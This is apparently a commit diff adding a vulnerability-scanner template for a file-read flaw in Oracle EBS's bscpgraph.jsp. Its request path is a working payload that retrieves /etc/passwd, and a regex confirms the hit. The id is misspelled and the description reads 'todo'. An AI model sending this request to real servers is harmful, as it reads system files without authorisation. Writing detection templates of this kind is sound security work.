Add Oracle-EBS LFI

vulnerabilities/oracle-ebs-bscpgraph-file-access.yaml

@@ -0,0 +1,18 @@
+id: oracle-ebs-bispgrapgh-file-read
+
+info:
+  name: Oracle EBS Bispgraph File Access
+  author: "Tirtha Mandal - https://twitter.com/tirtha_mandal"
+  severity: critical
+  description: todo
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
+
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body